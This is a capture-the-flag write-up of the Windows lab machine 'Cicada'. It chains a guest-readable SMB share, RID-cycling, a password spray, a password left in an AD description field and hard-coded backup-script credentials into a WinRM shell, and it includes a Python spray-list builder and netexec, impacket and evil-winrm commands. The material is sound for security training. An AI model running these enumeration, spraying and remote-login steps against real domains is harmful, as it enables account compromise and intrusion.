Cicada

A guest-readable SMB share leaks a default new-hire password, RID-cycling enumerates the domain user list, and a password spray plus credentials chained through an AD description field and a hard-coded backup script lands a WinRM shell and the user flag.

Overview

Cicada is an easy-difficulty Windows box built around a misconfigured Active Directory domain. The whole path to user is a credential-chaining exercise: the guest account can read an HR share that contains a default onboarding password, RID-cycling turns the domain into a known user list, and a password spray finds the one user who never rotated the default. From there, a password sitting in an AD description attribute unlocks a second share, whose backup script hard-codes the credentials of a WinRM-capable account. This post covers recon through the user flag.

Machine Matrix

[Machine Matrix radar chart; axes: Enumeration, Real-Life, CVE, Custom Exploitation, CTF-like]

Pure AD credential-chaining: guest SMB share, RID-cycling, password spray, AD description and hardcoded backup-script secrets — enumeration-heavy and highly realistic with no CVE.

Recon

Port          Service      Notes
53/tcp        DNS          Windows domain
88/tcp        Kerberos     domain cicada.htb
135/tcp       MSRPC        endpoint mapper
139/445/tcp   SMB          guest access enabled
389/636/tcp   LDAP/LDAPS   Active Directory
5985/tcp      WinRM        remote management

nmap -sC -sV -Pn 10.10.10.X

The Kerberos, LDAP, and SMB trio confirms a Windows domain controller for cicada.htb. Add the host so name-based tooling resolves:

# paste manually into /etc/hosts
10.10.10.X cicada.htb

Enumeration

SMB allows the built-in guest account to authenticate with an empty password. Enumerate shares with it:

netexec smb cicada.htb -u 'guest' -p '' --shares

The HR share is readable. Pull its contents:

smbclient //cicada.htb/HR -U 'guest%' -c "ls; get \"Notice from HR.txt\" /tmp/notice.txt"
grep -i password /tmp/notice.txt

Notice from HR.txt is a new-hire onboarding note that hands out the default password issued to every employee:

Cicada$M6Corpb*@Lp#nZp!8

A password is only useful with usernames. lookupsid brute-forces RIDs under the domain SID and asks the DC to resolve each one to a name over the lsarpc pipe, which works even from a guest session, so RID-cycle the full domain user list:

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep SidTypeUser | tee sidtypeuser.txt
sed -E 's/.*\\(.*) \(SidTypeUser\)/\1/' sidtypeuser.txt > users.txt
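The grep|sed one-liner keeps every SidTypeUser entry, including the machine account (CICADA-DC$) and krbtgt, neither of which can log on with a sprayed password. The following Python is an added example for this post, not a tool from the original writeup: it parses lookupsid output into a spray list and drops those entries. SAMPLE_LOOKUPSID is constructed to mimic lookupsid's output format; the domain SID, the RIDs and the names other than the three users this post names are placeholders.

```python
"""Turn impacket-lookupsid output into a password-spray target list.

Added example for this writeup, not a tool from the post. Does what the
grep|sed one-liner does, but also drops machine accounts (trailing '$')
and the accounts in NEVER_SPRAY. SAMPLE_LOOKUPSID is constructed; its
domain SID, RIDs and placeholder names are made up.
"""
import re
import sys

# Constructed sample of `impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass`.
SAMPLE_LOOKUPSID = r"""
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\jane.sample (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1110: CICADA\Dev Support (SidTypeAlias)
1601: CICADA\emily.oscars (SidTypeUser)
"""

# One resolved SID per line: "<RID>: <DOMAIN>\<name> (<SidType>)".
LINE_RE = re.compile(
    r"^(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)

# Accounts that can never log on with a sprayed password.
NEVER_SPRAY = {"guest", "krbtgt"}


def parse_lookupsid(output: str) -> list[dict]:
    """Parse every resolved-SID line; banner lines ('[*] ...') are ignored."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(
                {"rid": int(m["rid"]), "domain": m["domain"],
                 "name": m["name"], "type": m["type"]}
            )
    return entries


def spray_targets(output: str) -> list[str]:
    """User accounts worth spraying, in RID order.

    Keeps SidTypeUser entries only, then drops machine accounts (name ends
    in '$') and the accounts in NEVER_SPRAY. Administrator is kept on purpose.
    """
    targets = []
    for e in parse_lookupsid(output):
        if e["type"] != "SidTypeUser":
            continue
        if e["name"].endswith("$") or e["name"].lower() in NEVER_SPRAY:
            continue
        targets.append(e["name"])
    return targets


if __name__ == "__main__":
    # Pipe real lookupsid output in, or run with no stdin to see the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOOKUPSID
    print("\n".join(spray_targets(text)))
```

Run it as `impacket-lookupsid ... -no-pass | python3 spraylist.py > users.txt` (the script name is arbitrary). Before spraying the list, read the domain's lockout policy (netexec's `--pass-pol` shows it) so that one attempt per account is known to sit under the threshold.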

Foothold

1 — Spray the default password. A spray tries one password against every user, so each account sees a single failed attempt and stays under the lockout threshold; check the domain's lockout policy first, then spray for whoever never rotated the default:

netexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

That hits michael.wrightson.

2 — Leak a password from an AD description. With a valid domain account, enumerate user objects: the description attribute is readable by any authenticated domain user by default, and people store secrets there:

netexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

david.orelious has his password parked in plain sight in his description field (aRt$Lp#7t*VQ!3).

3 — Read the DEV share for hard-coded creds. david.orelious has READ on a second share:

netexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' -c "ls; get Backup_script.ps1 /tmp/Backup_script.ps1"
grep -iE 'username|password' /tmp/Backup_script.ps1

Backup_script.ps1 builds a PSCredential from ConvertTo-SecureString ... -AsPlainText -Force. A SecureString made that way only protects the value in memory; the plaintext is the argument sitting right in the script, so anyone who can read the file has it. It hands over emily.oscars : Q!3@Lp#M6b*7t*Vt, and that account is a member of Remote Management Users.

User flag

emily.oscars can log in over WinRM:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb

type C:\Users\emily.oscars.CICADA\Desktop\user.txt
# [redacted]

The WinRM shell and the user flag are ours.

Privilege escalation is left as an exercise — this post stops at user.

This post is licensed under CC BY 4.0 by the author.